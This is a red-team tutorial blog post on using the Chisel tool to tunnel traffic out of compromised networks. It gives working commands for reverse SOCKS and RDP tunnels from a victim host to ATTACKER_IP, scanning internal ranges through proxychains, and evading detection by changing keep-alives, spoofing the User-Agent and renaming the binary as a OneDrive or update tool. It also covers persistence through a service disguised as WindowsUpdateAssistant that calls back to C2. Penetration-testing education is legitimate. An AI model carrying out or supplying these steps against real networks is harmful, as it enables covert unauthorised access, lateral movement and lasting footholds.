Hey there, fellow hackers and pen testers! If you’re reading this article, you’re probably passionate about staying ahead in the game and mastering the tools that help us win big in cybersecurity. Today, I’ll be walking you through a powerful technique I’ve used in many red team engagements—tunneling traffic using Chisel, a fast TCP/UDP tunnel, transported over HTTP, secured via SSH.

While SSH dynamic forwarding is great, it often gets blocked by Deep Packet Inspection (DPI) because SSH looks like SSH. Chisel wraps that traffic in standard HTTP/WebSockets, allowing it to glide through proxy servers and firewalls like a stealth bomber.

1. Why Chisel?

Chisel is a single binary (Go-based) that acts as both client and server. Its main selling point is WebSockets.

  • Firewall Bypass: WebSockets look like standard web traffic (GET / Upgrade: websocket).
  • Performance: Much faster than legacy HTTP tunneling tools (like reGeorg).
  • Flexibility: Supports Reverse SOCKS (R:socks) and standard Port Forwarding (L:80:target:80).
  • Cross-Platform: Compile once (Go), run anywhere (Linux/Windows/Mac/Android).

Architecture Check

  • Chisel Server: Usually runs on your Attack Box (C2).
  • Chisel Client: Runs on the Victim (Compromised Host).

2. Mastering the Reverse SOCKS Proxy

For a red teamer, this is the bread and butter. You are inside a restrictive network. You want your entire toolkit (nmap, code, firefox) to route into that network.

Step 1: Start the Server (Your Attack Box)

The server must enable reverse tunneling (--reverse).

1
2

# Listen on port 8080. Allow clients to open reverse tunnels.
./chisel server -p 8080 --reverse

Step 2: Start the Client (The Compromised Host)

The client connects OUT to you and requests a reverse SOCKS tunnel.

1
2
3

# Syntax: R:[local_port]:socks
# If local_port is not specified (just 'socks'), the server listens on 1080.
./chisel client http://ATTACKER_IP:8080 R:socks

What just happened?

  1. Client connected to Server via HTTP/WS.
  2. Client requested a “Reverse SOCKS” tunnel.
  3. Server opened port 1080 on itself.
  4. Any traffic you throw at localhost:1080 (Server) goes down the pipe, out the Client, and into the Target Network.

Step 3: Pivot with Proxychains

On your attack box:

1
2

# /etc/proxychains.conf -> socks5 127.0.0.1 1080
proxychains nmap -sT -Pn -p 445 10.10.10.0/24

[!NOTE] Use -sT (Connect Scan) with Nmap. SOCKS proxies do not support half-open (-sS) SYN scans or ICMP. Update: Chisel now supports UDP over SOCKS5! This means you can run DNS queries (dig) or even some UDP-based exploits through the tunnel.

3. Advanced Tunnels: Port Forwarding

Sometimes you don’t want a full SOCKS proxy; you just want to expose one internal service.

Reverse Port Forward (Remote Access)

“Expose the internal 3389 (RDP) on my C2 server’s port 4444.”

1
2

# Client Command
./chisel client http://ATTACKER_IP:8080 R:4444:127.0.0.1:3389

Now, connecting to ATTACKER_IP:4444 connects you to the Victim’s RDP.

Local Port Forward (Accessing from Inside)

“Map the internal Database (10.0.0.5:1433) to my local port 1433.” This assumes you are running the Client on your machine and connecting to a Server inside.

1

./chisel client http://TARGET_IP:8080 1433:10.0.0.5:1433

4. Hardening the Tunnel: TLS and Authentication

Running Chisel over plain HTTP (port 8080) is risky. Blue teams inspecting traffic will see the data payload.

Adding Authentication (--auth)

Prevent random internet scanners from connecting to your C2 listener.

1
2
3
4
5

# Server
./chisel server -p 8443 --reverse --auth "user:S3cretPass!"

# Client
./chisel client --auth "user:S3cretPass!" https://ATTACKER_IP:8443 R:socks

Enabling TLS (HTTPS)

Use a real SSL certificate to blend in with HTTPS traffic.

1
2
3
4
5
6
7
8

# 1. Generate keys (or use Let's Encrypt)
openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out cert.pem

# 2. Server
./chisel server -p 443 --reverse --tls-key key.pem --tls-cert cert.pem

# 3. Client (Connect using wss:// implicitly via https)
./chisel client https://ATTACKER_IP:443 R:socks

5. Fingerprinting and Evasion

Chisel is popular, which means detection signatures exist.

  1. Custom Headers: Change the User-Agent to match typical browser traffic.
    1

    ./chisel client --header "User-Agent: Mozilla/5.0..." http://...
  2. Timing: Chisel sends keep-alive packets. In high-security environments, modify the Go source code (client/client.go) to change the keep-alive interval (KeepAlive) before compiling.
  3. Renaming: Don’t drop chisel.exe. Rename it to something innocuous like update_manager.exe or onedrive_updater.exe.

Chisel vs. Ligolo-ng

When should you use what?

FeatureChiselLigolo-ng
InterfaceSOCKS5 ProxyFull TUN Interface
ProtocolTCP/UDP over HTTPTLS / QUIC
CapabilitiesTCP Connect only (mostly)ICMP, SYN Scan, UDP
RequirementsNo Admin neededRequires Admin/Root (for TUN)
Use CaseQuick, low-privilege pivotFull Network Layer Routability

6. Persistence in Windows

You have Admin access and want Chisel to run forever. Use NSSM (Non-Sucking Service Manager) to install it as a service.

1
2
3
4
5

# Install Service
nssm install WindowsUpdateAssistant "C:\Windows\Temp\chisel.exe" "client --auth user:pass https://C2:443 R:socks"

# Start it
nssm start WindowsUpdateAssistant

Now, even if the user logs out, your tunnel stays up.

Conclusion

Chisel is the architect of modern network pivots. By mastering reverse SOCKS proxies, implementing TLS, and understanding how to evade detection, you can maintain a persistent and stealthy presence in even the most restricted environments.

Always remember: a red teamer is only as good as their ability to move laterally. Master the tunnel, and you master the network.

Happy hacking!

References